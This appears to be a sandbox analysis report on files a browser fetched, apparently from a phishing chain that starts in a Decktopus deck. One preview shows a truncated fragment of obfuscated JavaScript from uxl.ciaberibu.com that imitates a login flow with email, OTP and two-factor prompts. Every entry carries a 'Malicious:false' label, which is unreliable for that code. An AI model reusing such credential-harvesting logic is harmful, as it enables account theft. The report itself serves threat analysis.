                                                                                                                              Preview:@charset "UTF-8";.qtip{box-shadow:none;direction:ltr;display:none;font-size:10.5px;left:-28000px;line-height:12px;max-width:280px;min-width:50px;padding:0;position:absolute;top:-28000px}.qtip-content{word-wrap:break-word;padding:5px 9px;text-align:left}.qtip-content,.qtip-titlebar{overflow:hidden;position:relative}.qtip-titlebar{border-width:0 0 1px;font-weight:700;padding:5px 35px 5px 10px}.qtip-titlebar+.qtip-content{border-top-width:0!important}.qtip-close{border:1px solid transparent;cursor:pointer;outline:medium none;position:absolute;right:-9px;top:-9px;z-index:11}.qtip-titlebar .qtip-close{margin-top:-9px;right:4px;top:50%}* html .qtip-titlebar .qtip-close{top:16px}.qtip-icon .ui-icon,.qtip-titlebar .ui-icon{direction:ltr;display:block;text-indent:-1000em}.qtip-icon,.qtip-icon .ui-icon{-moz-border-radius:3px;-webkit-border-radius:3px;border-radius:3px;text-decoration:none}.qtip-icon .ui-icon{background:transparent none no-repeat -100em -100em;color:inherit;height:14px;line-heigh
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:ASCII text, with very long lines (29927)
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):46356
                                                                                                                              Entropy (8bit):5.715848693719105
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:26937B8944F2A0AD955EB877FD3F4658
                                                                                                                              SHA1:B314452588251833A603EF0AC149C106E1A6B88B
                                                                                                                              SHA-256:FDEEC84DA6D9A4FF1BE1B5A3AEF1DA41CD4EAB880A0FBA7DC5642E2079E98D08
                                                                                                                              SHA-512:E8FE082D5C3F0ABC2B97FBD838B277341A182B7332EE469F197F2AB0B1D3EAEA41B759138A49D5B8CCF0ACD8BF96AD6963B2A288FE0C70626A08FC9886A9CBCF
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              URL:https://app.decktopus.com/static/css/main.575a8867.css
                                                                                                                              Preview:@font-face{font-display:swap;font-family:Sailec;font-style:normal;font-weight:400;src:url(/static/media/Sailec-Regular.f1c6405690ce1bea4f16.eot);src:url(/static/media/Sailec-Regular.f1c6405690ce1bea4f16.eot?#iefix) format("embedded-opentype"),url(/static/media/Sailec-Regular.307c4fb7f8da8e0a7fa0.woff2) format("woff2"),url(/static/media/Sailec-Regular.a0bdafa57998d73c7d6e.woff) format("woff"),url(/static/media/Sailec-Regular.37467428d43bff93e523.ttf) format("truetype"),url(/static/media/Sailec-Regular.49e949119dc6c86aafa5.svg#Sailec-Regular) format("svg")}@font-face{font-display:swap;font-family:Sailec;font-style:italic;font-weight:400;src:url(/static/media/Sailec-RegularItalic.30c88c94ee922ebe167b.eot);src:url(/static/media/Sailec-RegularItalic.30c88c94ee922ebe167b.eot?#iefix) format("embedded-opentype"),url(/static/media/Sailec-RegularItalic.8cdfafe3ce888938e8e5.woff2) format("woff2"),url(/static/media/Sailec-RegularItalic.4c39f2a667792780fd20.woff) format("woff"),url(/static/media/Sa
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:JSON data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):30
                                                                                                                              Entropy (8bit):3.939572261986723
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:9ABF99E9F4E068283E232A2F3A978BD8
                                                                                                                              SHA1:739A42442ED8C00B7E743CCB27B4CE57CC8BC478
                                                                                                                              SHA-256:755ABF6E78956DFE1A010A086E287F712B051C2DB2D57ABC47632DDC58CCA607
                                                                                                                              SHA-512:48E029D481A173882AE839AA86E1C7FAC52F06019E64E5537AEDC128B36212368FB0B7D2B810781752A62635D8145C39AA2878F014BDC69FF8A0173FA1F504E9
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              Preview:{. "origin": "8.46.123.33".}.
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:PNG image data, 420 x 94, 8-bit/color RGBA, non-interlaced
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):10796
                                                                                                                              Entropy (8bit):7.946024875001343
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:12BDACC832185D0367ECC23FD24C86CE
                                                                                                                              SHA1:4422F316EB4D8C8D160312BB695FD1D944CBFF12
                                                                                                                              SHA-256:877AE491D9AAC5C6EF82A8430F9F652ACE8A0DBC7294BD112AAD49BD593769D0
                                                                                                                              SHA-512:36C319AC7F75202190E7A59F3F3C92892A71D5F17663E672319A745B6574BCFDE7C89B35F480CB15A193924DACB9D67F8CA1E1BC2BF33FC5CCBFA152CC7BA2D0
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              URL:https://ok4static.oktacdn.com/fs/bcg/4/gfsh9pi7jcWKJKMAs1t7
                                                                                                                              Preview:.PNG........IHDR.......^.....l2`...).IDATx..}...U.... w...B..P$.Hv..t......x.EA@.Q`.E......-.".(..X`..D....5]]U}....$3...&...guOw..}>.....~....w.ZZ...z..FZ$I.$I....N.......tt.$e...M....ru$I.$IR.h.AvK0.t..wy.:.1...D.H...LS....iF~.X...smr.$I.$IR.4.....SY..@....h8.....*..dB...1.eG...$I.$.hZ...8.r...[.A.I..XE..hdA{Z..teaF...u:}.1^..-I.$I.FP.A..Nm..........A78...=.%W_.$I..8YQ.H2z#.D_...m..k..u.t..R6#.....N....){...$I..1@...g...@a ..u2..dL...*ai.d.[.$I..D.....OM..a...,h%u.B.....0...57..hrW..$I....Gf.|.=.eg`.........k.J.$IR..<.u....]....@.d...H..$I.$5..MWwu:....H|Y..,.$.I.$I....Qu...s.NzzM..]..;$ I.$IR......+..L9......63.I@.$I..z..#.....:..7...s..<$ I.$I.hP.tu...m"..o1.y.@..W1T<(..... z%."?.4zE..$ ..Y1z`.P..!....`t%t....[..d...N.UKy&.A;..6S...<...........o...]0...r.$I......0..R.....N.....0Wi._.;...M..Lrb{.7w..].jm.r....C...&..gd}..Etm}..~L.l...}n\'...$..Mr.i..{..n..9.....SwMh.}.Q{./wJ.....B]:.....+..\V...A.S.w..6.....,..[.......J@....-.4.....:..Zvt.r.*.
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:ASCII text, with very long lines (25556)
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):342418
                                                                                                                              Entropy (8bit):5.579078631694102
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:388440EA9DC5153656731A1E9BADC57D
                                                                                                                              SHA1:3D4A2059ACF6AC0E73E43E2BD0375BBF4FB5978A
                                                                                                                              SHA-256:AEA9DA129E92544076B2BC72A0939982AA8736A4DA5B7E555B1F1461ABBE969D
                                                                                                                              SHA-512:1838A70E5399AD2E0084BB2FAD20A72216E5DDFB572E63F811374E06C7881D46D6A65B768873EC97ADBA935532B6451914AE972260C3C21BF2A637E19CFF15BD
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              URL:https://www.googletagmanager.com/gtag/js?id=G-RDRSM8WPZJ&l=dataLayer&cx=c
                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"6",. . "macros":[{"function":"__e"},{"vtp_signal":1,"function":"__c","vtp_value":1},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_cross_domain","priority":52,"vtp_rules":["list","decktopus\\.com"],"tag_id":15},{"function":"__ogt_referral_exclusion","priority":42,"vtp_includeConditions":["list","^accounts\\.google\\.com$","checkout\\.stripe\\.com"],"tag_id":11},{"function":"__ogt_ga_send","priority":42,"vtp_value":true,"tag_id":13},{"function":"__ogt_session_timeout","priority":42,"vtp_sessionMinutes":30,"vtp_sessionHours":0,"tag_id":14},{"function":"__ogt_1p_data_v2","priority":42,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR"
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:ASCII text, with very long lines (25556)
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):342819
                                                                                                                              Entropy (8bit):5.579549045374749
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:C3880E0721641EC0AD5BF7925A11B1B5
                                                                                                                              SHA1:8A53C837336D1A7FDD4F2EBB415C904E6E80AAF2
                                                                                                                              SHA-256:D87A529A26F24E35354A3391D6F229F943ACE62E0707D59CE74DBCE046E58747
                                                                                                                              SHA-512:76ABECB20293899698E915EAE9355536906DEEB8D77148437322FDC2A117D7B5473846A421739973BBFD4433916B1E9B3F66594EA7E87F2DCFB9F251EBE2F55B
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"6",. . "macros":[{"function":"__e"},{"vtp_signal":1,"function":"__c","vtp_value":1},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_cross_domain","priority":52,"vtp_rules":["list","decktopus\\.com"],"tag_id":15},{"function":"__ogt_referral_exclusion","priority":42,"vtp_includeConditions":["list","^accounts\\.google\\.com$","checkout\\.stripe\\.com"],"tag_id":11},{"function":"__ogt_ga_send","priority":42,"vtp_value":true,"tag_id":13},{"function":"__ogt_session_timeout","priority":42,"vtp_sessionMinutes":30,"vtp_sessionHours":0,"tag_id":14},{"function":"__ogt_1p_data_v2","priority":42,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR"
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):24
                                                                                                                              Entropy (8bit):2.459147917027245
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:BC32ED98D624ACB4008F986349A20D26
                                                                                                                              SHA1:2D3DF8C11D2168CE2C27E0937421D11D85016361
                                                                                                                              SHA-256:0C9CF152A0AD00D4F102C93C613C104914BE5517AC8F8E0831727F8BFBE8B300
                                                                                                                              SHA-512:71ACC6DA78D5D5BF0EEA30E2EE0AC5C992B00EFEC959077DFE0AB769F1DBBD9AF12D5C5C155046283D5416BEB606A9EF323FB410E903768B1569B69F37075B4E
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              Preview:GIF89a.......,..........
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):2905
                                                                                                                              Entropy (8bit):3.962263100945339
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:FE87496CC7A44412F7893A72099C120A
                                                                                                                              SHA1:A0C1458C08A815DF63D3CB0406D60BE6607CA699
                                                                                                                              SHA-256:55CE3B0CE5BC71339308107982CD7671F96014256DED0BE36DC8062E64C847F1
                                                                                                                              SHA-512:E527C6CD2A3D79CA828A9126E8FF7009A540AA764082750D4FA8207C2B8439CA1FDC4459E935D708DC59DCFFE55FE45188EB5E266D1B745FCA7588501BC0117D
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              URL:https://uxl.ciaberibu.com/wxZXAXtwDkZBWvuXbAI5ZmZ6jrsRbndIPRGn7ldV7pjpj90172
                                                                                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.854q.488.444.941.932a9.974,9.974,0,0,1,.819,1A4.951,4.951,0,0,1,37,34.736a3.133,3.133,0,0,1,.218,1.15,3.493,3.493,0,0,1-.261,1.324,3.381,3.381,0,0,1-.749,1.132q-.888.888-1.6,1.568a8.753,8.753,0,0,1-1.489,1.15,6.17,6.17,0,0,1-1.716.705A9.367,9.367,0,0,1,29.151,42a13.73,13.73,0,0,1-3.9-.592A21.891,21.891,0,0,1,21.26,39.77a27.749,27.749,0,0,1-3.885-2.491,34.863,34.863,0,0,1-3.6-3.153,34.6,34.6,0,0,1-3.127-3.606,27.717,27.717,0,0,1-2.456-3.876A22.2,22.2,0,0,1,6.584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.648,0,0,1,1.542,1.15,17.725,17.725,0,0,1,1.376,1.428q.645.
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65532), with no line terminators
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):103933
                                                                                                                              Entropy (8bit):5.201385561091186
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:7BCC10882A3FEE621FCD4FF3CCE42AFA
                                                                                                                              SHA1:EDD5F4E27DB9BCA62499172114C24ED4E634E2C4
                                                                                                                              SHA-256:DB1F4FBD04BA255DDE2485CDA40B918F8286AD166F43BF7F1388EC7E7E52F1DD
                                                                                                                              SHA-512:77BE919702CDAF6184C00E90439FD5A1A40D2F8FCB9FF26983FF43995B4585EB24BFE130BBDC372D8233BFC17F21F39168683BC18AD4B0B6ACEC8EDF6B3A00A4
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              URL:https://uxl.ciaberibu.com/34USKaeD4c0pda3osdjid3O2klo1yKXZAR8467110
                                                                                                                              Preview:const _0x41ffed=_0x1609;function _0x36cc(){const _0x47dfa8=['name','onclick','multbackbtnclick','input-group','style','callotp','yahoo.com','display','otp\x20sent','autocomplete','duplicate\x20request','iProofEmailEntry','1329408KUShDZ','authappimg','backbtnid','otp\x20sent\x20error','section_otp','dirltr','span','backgroundImage','includes','error_verifyemail','backbtnclick','error-inp','head','selecttwofamethod(this)','.bannerlogo','Forgot\x20my\x20password','assertive','loading','try_again_otp','fail','section_authapp','#section_uname_content','section_signinanothererror','removeAttribute','a_text','app','section_uname','hide-to-left\x200.5s','button','</label>\x0a\x20\x20\x20\x20\x20\x20</div>\x0a\x20\x20\x20\x20\x20\x20<div\x20class=\x22phcontainer\x22\x20id=\x22iProofPhoneEntry\x22\x20style=\x22display:\x20none;\x22\x20aria-hidden=\x22true\x22>\x0a\x20\x20\x20\x20\x20\x20\x20\x20<label\x20id=\x22iProofPhoneHint\x22\x20for=\x22iProofPhone\x22\x20class=\x22form-group-top\x22\x20ari
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:PNG image data, 2160 x 443, 8-bit/color RGBA, non-interlaced
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):49602
                                                                                                                              Entropy (8bit):7.881935507115631
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:DB783743CD246FF4D77F4A3694285989
                                                                                                                              SHA1:B9466716904457641B7831868B47162D8D378D41
                                                                                                                              SHA-256:5913B1EC0FC58AB2BEC576804B9E9B566A584EA3D21A1BF74A7B40051A447FDC
                                                                                                                              SHA-512:E6F36C52996B6BF8B07C7A102DEF2D555A1D35FA12F1A2016EDD8F3C86C33DD3545513B436AB6B4EF1D1CAD8A5CA5D352BA587EEE605638640B258C3976D9033
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              Preview:.PNG........IHDR...p..........{......sBIT....|.d.....pHYs..;...;...3.+....tEXtSoftware.www.inkscape.org..<... .IDATx...w.]U....L.I(!.B..J..R....PD.z-.(...4Q..*MQ. .(..EE.AP:.....HI.... ....ur3..r.Y.|....z..3.2.g..{..Y.V..6.u...U...Q.Z.X......m..........^......O.^l......Y.)`|...:......x.:."0r...H.W.....,.......j.....L%]s../4.>.<.........S.$I.$I.$I.T....*.(`s`S`.`C`mR..J...6.x.x.x..z9.......g..j}R...h.1.t]=....n..#.f.I.$I.$I.$I%c.G.. 5il.l.lCj.(S.F;.....7...AZ.@*B....%.E....C.be3..K....S."CI.$I.$I.$I...jV.v.v.v$5l..M.ysI......x{/i...Y...o..m.......v.6.>R..$I.$I.$I.......F.{..6v!...1{.Y..9ng...S..TF.I..;.o&5A.....&.w....$5J..M$I.$I.$I.$.........Q;..IQ...9n.nl.Z.e.......j.`hd..{..=p-p=n."I.$I.$I.$eg.G...........8...i......b. [.{.V.........V...96GI.$I.$I.$IY...c ..R...Q.q..,..........Gm........X=6NW......clp.I.$I.$I.$IZ*..g...s...c...F.A.<z*.Q.a...+.?....8.Xn.GO.$I.$I.$I..,O.l....@.....z.....R..a$.:...I.yb-....l....$I.$I.$I.$.....$.'S..j.p..3NBGX..M.3.?.......p$I.$
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:ASCII text, with very long lines (9103)
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):229083
                                                                                                                              Entropy (8bit):5.458458740778304
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:697D657566B4FCFB98A23E408CFF4966
                                                                                                                              SHA1:8897D5A227DBE05BC9AE15973CDE8D3B083DD6C6
                                                                                                                              SHA-256:EAA003D85CB77F94FCAE98396E583CE01D0C375B57235402C884EF8A792B951E
                                                                                                                              SHA-512:197D94B40296536C2BCD87AEE6903A3A696EC4696A564987F1F5D75ECCDB63428029B8628AD725589DD731520DA36C2DE7FA2A56482DE621BCF7FF0317A52012
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:Web Open Font Format, TrueType, length 35970, version 1.0
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):35970
                                                                                                                              Entropy (8bit):7.989503040923577
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:496B7BBDE91C7DC7CF9BBABBB3921DA8
                                                                                                                              SHA1:2BD3C406A715AB52DAD84C803C55BF4A6E66A924
                                                                                                                              SHA-256:AE40A04F95DF12B0C364F26AB691DC0C391D394A28BCDB4AEACFACA325D0A798
                                                                                                                              SHA-512:E02B40FEA8F77292B379D7D792D9142B32DFCB887655A2D1781441227DD968589BFC5C00691B92E824F7EDB47D11EBA325ADE67AD08A4AF31A3B0DDF4BB8B967
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              URL:https://uxl.ciaberibu.com/yzLJ1e65COm6qNC78vt30op50
                                                                                                                              Preview:wOFF..............$ .......\...&............DSIG...T............GPOS..........N..B..GSUB...`.........3y.OS/2.......F...`i.{[cmap...X.......<.?+.cvt ......./...<)...fpgm............?...gasp................glyf..!t..Ra....$.ihead..s....3...6..}.hhea..t....!...$....hmtx..t0.......x?s.#loca..w.........LC%.maxp..{X... ... .5..name..{x..........post..~@........1+.,prep.............P..x..\.tU..;y...!..!..R.4."(."*".U..V.]3...r..5c...j....._.7U...H..1MSE...0b..b&.......%..w...}.{.......u...s..g..soBLD~.C.)n..1.Q...z.q. ..R..)n.QY.v..{.(...o...O.......G...{to.~.....,..#<.w...W...?6..3....2.)O........].`_a..F'.6..."}&..$'.K...a..NK$..01ar......-.Do_. .H.].x'{....n....{.|.L.p..u...-.w}.}...~.....(.zP:..^t.=D?..i9.....m.......AE.......J.....j......q&_...`....P....M<.o.[.V....H..Sx:...<.g.....x>/.......^..x9.....Ws...&.....x....jUJ...B.S...2(_...U...Q...<..y.j.y...P.x.:....m+..V.....5h[.~E.WL..rp....0..*Pu..$OA....LJ.Y.....9.e...L..... /"?.m.......+..J.........
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):112
                                                                                                                              Entropy (8bit):4.894159109782288
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:0AA0A8A7CEC191A0F478E716AF5BB152
                                                                                                                              SHA1:E388529CE697865282B6DACB5F192D2493832AE9
                                                                                                                              SHA-256:D92A47F41D701A01EF66E1DAC95417B273C5AE8FEFD8CCBE5CABE069D252FE4B
                                                                                                                              SHA-512:FDB0F663E5A84BDCB051C62BE1C25F0D429B2293ADF7E27DB65A9E62CBD9AF6954C2C4179BBEA89025B5C0644BB87BF6953D4189F3B7013CD2755C29D6F904CD
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xNDkSFwnUwZdgDVHT6RIFDV9X_g0SBQ0TmyRjEjMJ3pGryOLmiJ4SBQ3PIyr_EgUNxZPEJBIFDYmlZ8sSBQ3DGTmQEgUN0AJA7BIFDahd43Q=?alt=proto
                                                                                                                              Preview:ChIKBw1fV/4NGgAKBw0TmyRjGgAKPgoLDc8jKv8aBAgJGAEKBw3Fk8QkGgAKBw2JpWfLGgAKBw3DGTmQGgAKCw3QAkDsGgQICRgBCgcNqF3jdBoA
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2131), with no line terminators
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):2131
                                                                                                                              Entropy (8bit):5.678060036478741
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:8BB5AC57645D6D9FA900BA8867ADFB5D
                                                                                                                              SHA1:B0796EA19BE7F1C0707BCDC078ACA5A3F8239C00
                                                                                                                              SHA-256:A3C3D639750013F3131729A877C245DE2E45C839B4CAEC637DD9C3E4A8F36B9F
                                                                                                                              SHA-512:552D958FF5BCCB54EEF962A1DCE7A24B9D7CFCABDE5AC3ED748F13EBCF3AD2B87DBAEBAE56A3BEF3D75EAD9D1D57BB25E4E2D20DAED260C23B2ABD89021DDDBA
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              URL:https://apiv21.decktopus.com/api/public/decks/4017922/slides/17104433/data/5266337
                                                                                                                              Preview:{"code":200,"data":{"slideData":{"id":5266337,"sessionId":"615c5afe-9e8d-44ce-86a1-68081c5a79d7","versionName":null,"isSwapColor":false,"coverIndex":null,"background":null,"tempSvg":{},"svgType":"GENERIC_1","slide":{"id":17104433,"slideNote":"WHOOPS","speakerNote":"WHOOPS"},"slideDataComponents":[{"component":{"id":17340041,"tempId":"4baf95ec-501f-42c0-a8cb-94878bb58ffb","sessionId":"615c5afe-9e8d-44ce-86a1-68081c5a79d7","type":"1","positions":{"x":560,"y":0,"width":800,"height":600,"rotate":0,"scale":1,"zIndex":5001},"style":{"opacity":null,"isHidden":false},"data":{"mediaType":"0","mediaUrl":"https://cfv21.decktopus.com/users/2641051/80d819a0-368d-4c88-b083-b61e1ed5568b.png?Expires=1722371784&Key-Pair-Id=K295BWQCL741S6&Signature=wFT1acZbjasVw5cFHnTB-X5qan9HZ4C5hdMP-RY0Fck1zYhkbFHUjflMSX6y2f7qHMFQoX1FcYQ1dc~G3nDFd5A9rCEVWbjjgrBpUXJ51oiiSPESSNMMoa2gM6xWO~OiZ3h69fQZjv6poBCSS8EDP3a1ThLaBOE2Ske1eUJDJBrksdQwT3M0MPeXH4W7NpOOUFlRs5T2IWQoSPJbh9FneFsR7pW6gs7zIdV5dbap45A6OQaI4VYWGiwrcrsB-NPybf4
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:JSON data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):174
                                                                                                                              Entropy (8bit):4.4435858534741
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:0133A1F266F4740A5D50DE1410FC1CA5
                                                                                                                              SHA1:64955AA4F31415A69929B984665530F3C8C65E1D
                                                                                                                              SHA-256:94C5140FFBCABF14891B919CB87810EF0B7307CFE424DFFE47D25FB5FD6A551C
                                                                                                                              SHA-512:D6534F3C3305B72BDAEEE3C11CF0C193832E07DE6BBC2D41F577B7C25927BEB2F69DA987E57953BAACE421A805A91A26CDB2125ACAE99C3B7E84272B219E91EE
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              Preview:{"type": "validation_error", "code": "no_data", "detail": "No data found. Make sure to use a POST request when sending the payload in the body of the request.", "attr": null}
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:ASCII text, with very long lines (5482)
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):70979
                                                                                                                              Entropy (8bit):5.336250550697327
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:177633DBF0E8F8599E26DFA49D5A28D6
                                                                                                                              SHA1:9E881ABE765C5FC5F14CFCEF4F3D9145712E2F6F
                                                                                                                              SHA-256:596FA3F21ACF19E7BC986B4B02FF976661B5F395DF63555C858CEE2C6236D8BE
                                                                                                                              SHA-512:282B311158D79335CED7128009222703C6042F5D95135BF53F7564FCABAA79CFDC2453821CB2EAC2EFEF57E60FA567538C6F5C464A7059A3AE0F2DF9E942A43B
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):48316
                                                                                                                              Entropy (8bit):5.6346993394709
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                              SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                              SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                              SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
